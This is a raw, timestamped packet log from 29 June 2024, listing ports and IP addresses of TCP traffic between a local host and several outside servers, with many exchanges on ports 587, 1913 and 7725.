Jun 29, 2024 10:02:19.175972939 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:19.175981998 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:19.175991058 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:19.176001072 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:19.176002026 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:19.176013947 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:19.176023006 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:19.176038980 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:19.176062107 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:19.207457066 CEST	443	49738	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.207550049 CEST	49738	443	192.168.2.4	104.26.13.205
Jun 29, 2024 10:02:19.211239100 CEST	49738	443	192.168.2.4	104.26.13.205
Jun 29, 2024 10:02:19.211251020 CEST	443	49738	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.211458921 CEST	443	49738	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.245304108 CEST	49738	443	192.168.2.4	104.26.13.205
Jun 29, 2024 10:02:19.265762091 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:19.288503885 CEST	443	49738	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.301197052 CEST	80	49737	107.154.156.233	192.168.2.4
Jun 29, 2024 10:02:19.302229881 CEST	49741	443	192.168.2.4	107.154.156.233
Jun 29, 2024 10:02:19.302272081 CEST	443	49741	107.154.156.233	192.168.2.4
Jun 29, 2024 10:02:19.302361965 CEST	49741	443	192.168.2.4	107.154.156.233
Jun 29, 2024 10:02:19.302787066 CEST	49741	443	192.168.2.4	107.154.156.233
Jun 29, 2024 10:02:19.302805901 CEST	443	49741	107.154.156.233	192.168.2.4
Jun 29, 2024 10:02:19.319538116 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:19.350811005 CEST	49737	80	192.168.2.4	107.154.156.233
Jun 29, 2024 10:02:19.351485014 CEST	443	49738	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.351537943 CEST	443	49738	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.351636887 CEST	49738	443	192.168.2.4	104.26.13.205
Jun 29, 2024 10:02:19.352024078 CEST	49738	443	192.168.2.4	104.26.13.205
Jun 29, 2024 10:02:19.359370947 CEST	443	49740	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.359427929 CEST	49740	443	192.168.2.4	104.26.13.205
Jun 29, 2024 10:02:19.360766888 CEST	49740	443	192.168.2.4	104.26.13.205
Jun 29, 2024 10:02:19.360774040 CEST	443	49740	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.361037016 CEST	443	49740	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.362193108 CEST	49740	443	192.168.2.4	104.26.13.205
Jun 29, 2024 10:02:19.363116026 CEST	49742	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:19.364092112 CEST	49743	80	192.168.2.4	208.95.112.1
Jun 29, 2024 10:02:19.367913961 CEST	7725	49742	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:19.367981911 CEST	49742	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:19.373027086 CEST	80	49743	208.95.112.1	192.168.2.4
Jun 29, 2024 10:02:19.373090029 CEST	49743	80	192.168.2.4	208.95.112.1
Jun 29, 2024 10:02:19.373331070 CEST	49743	80	192.168.2.4	208.95.112.1
Jun 29, 2024 10:02:19.378864050 CEST	80	49743	208.95.112.1	192.168.2.4
Jun 29, 2024 10:02:19.393412113 CEST	49742	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:19.393698931 CEST	49742	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:19.398351908 CEST	7725	49742	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:19.404508114 CEST	443	49740	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.440197945 CEST	7725	49742	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:19.506114960 CEST	443	49740	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.506164074 CEST	443	49740	104.26.13.205	192.168.2.4
Jun 29, 2024 10:02:19.506494045 CEST	49740	443	192.168.2.4	104.26.13.205
Jun 29, 2024 10:02:19.506714106 CEST	49740	443	192.168.2.4	104.26.13.205
Jun 29, 2024 10:02:19.728399038 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:19.733347893 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:19.733413935 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:19.743582010 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:19.748384953 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:19.785466909 CEST	443	49741	107.154.156.233	192.168.2.4
Jun 29, 2024 10:02:19.785552979 CEST	49741	443	192.168.2.4	107.154.156.233
Jun 29, 2024 10:02:19.788907051 CEST	49741	443	192.168.2.4	107.154.156.233
Jun 29, 2024 10:02:19.788944960 CEST	443	49741	107.154.156.233	192.168.2.4
Jun 29, 2024 10:02:19.789377928 CEST	443	49741	107.154.156.233	192.168.2.4
Jun 29, 2024 10:02:19.797765970 CEST	49741	443	192.168.2.4	107.154.156.233
Jun 29, 2024 10:02:19.840526104 CEST	443	49741	107.154.156.233	192.168.2.4
Jun 29, 2024 10:02:19.841387033 CEST	80	49743	208.95.112.1	192.168.2.4
Jun 29, 2024 10:02:19.847702980 CEST	7725	49742	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:19.847755909 CEST	49742	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:19.882038116 CEST	49743	80	192.168.2.4	208.95.112.1
Jun 29, 2024 10:02:20.161709070 CEST	443	49741	107.154.156.233	192.168.2.4
Jun 29, 2024 10:02:20.161787033 CEST	443	49741	107.154.156.233	192.168.2.4
Jun 29, 2024 10:02:20.161845922 CEST	49741	443	192.168.2.4	107.154.156.233
Jun 29, 2024 10:02:20.168955088 CEST	49741	443	192.168.2.4	107.154.156.233
Jun 29, 2024 10:02:20.169286013 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:20.174156904 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:20.336811066 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:20.358424902 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:20.363456011 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:20.363544941 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:20.378794909 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:20.383584023 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:20.542352915 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:20.585170031 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:20.690180063 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:20.695135117 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:20.695220947 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.151849031 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.152056932 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.156878948 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.334748030 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.334886074 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.340086937 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.366369009 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.366492987 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.371376038 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.518616915 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.519118071 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.523849964 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.553687096 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.553802967 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.558723927 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.708908081 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.708925009 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.708935022 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.708991051 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.728503942 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.733302116 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.741561890 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.742028952 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.746823072 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.884350061 CEST	7725	49735	195.10.205.94	192.168.2.4
Jun 29, 2024 10:02:21.911114931 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.913629055 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.918458939 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.928930044 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:21.934868097 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.934885979 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.934895039 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:21.934942961 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.936058044 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:21.940953970 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.104305029 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.110049009 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:22.115010023 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.123528004 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.127831936 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:22.132611990 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.293073893 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.295191050 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:22.299992085 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.315148115 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.315397024 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:22.320240974 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.485596895 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.492770910 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:22.497541904 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.502871990 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.506598949 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:22.511418104 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.675331116 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.675538063 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:22.680286884 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.732217073 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.732382059 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:22.737127066 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.862006903 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.862210989 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:22.868339062 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.925087929 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:22.925378084 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:22.930152893 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.046298981 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.046842098 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.046931028 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.046931028 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.046973944 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.051819086 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.051836014 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.052798986 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.116230965 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.116681099 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.122823954 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.230659962 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.268141985 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.273036957 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.305366993 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.305716038 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.305787086 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.305836916 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.305836916 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.310436964 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.310480118 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.310656071 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.310664892 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.451236010 CEST	587	49745	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.451606989 CEST	49745	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.451863050 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.456623077 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.456696987 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:23.585958958 CEST	587	49746	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:23.632050037 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:24.208687067 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.208858013 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:24.213905096 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.393084049 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.393208027 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:24.398025036 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.578058958 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.578438997 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:24.583350897 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.769728899 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.769742012 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.769804955 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:24.769889116 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.769910097 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.770011902 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:24.772360086 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:24.777247906 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.956419945 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:24.977438927 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:24.982289076 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:25.164832115 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:25.165186882 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:25.183201075 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:25.362637043 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:25.362979889 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:25.367846012 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:25.550326109 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:25.550575972 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:25.555741072 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:25.604718924 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:25.609605074 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:25.734738111 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:25.734910965 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:25.739841938 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:25.769085884 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:25.769103050 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:25.769112110 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:25.769157887 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:25.769184113 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:25.769192934 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:25.769202948 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:25.769251108 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:25.926804066 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:25.927026033 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:25.931926966 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:26.111231089 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:26.111696005 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:26.111790895 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:26.111838102 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:26.111890078 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:26.112045050 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:26.112140894 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:26.112202883 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:26.112240076 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:26.112270117 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:26.120553970 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:26.120614052 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:26.120654106 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:26.120779991 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:26.120789051 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:26.120798111 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:26.120805979 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:26.390849113 CEST	587	49747	51.195.88.199	192.168.2.4
Jun 29, 2024 10:02:26.444634914 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:26.643102884 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.648252010 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.648268938 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.648277044 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.648284912 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.648312092 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.648319006 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.648371935 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.648396969 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.648567915 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.648576975 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.648580074 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.648591042 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.648601055 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.648633957 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.648672104 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.653337002 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653345108 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653386116 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653393984 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653402090 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653426886 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.653466940 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.653542995 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653551102 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653577089 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653584003 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653589964 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653605938 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.653666973 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.653696060 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653703928 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653763056 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.653892040 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.653949976 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.658278942 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658312082 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658392906 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658394098 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.658401012 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658417940 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.658418894 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658469915 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.658495903 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.658500910 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658509016 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658549070 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.658574104 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.658615112 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658653021 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658670902 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.658704996 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.658935070 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658942938 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658950090 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658957005 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658963919 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.658971071 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659003973 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659009933 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.659013033 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659019947 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659028053 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659034967 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659038067 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659044981 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659050941 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659120083 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.659182072 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659189939 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659195900 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659203053 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.659254074 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.659271002 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.662962914 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663028955 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.663151026 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663157940 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663208961 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.663244963 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663252115 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663269043 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663275003 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663321972 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663330078 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663343906 CEST	49744	1913	192.168.2.4	209.90.234.57
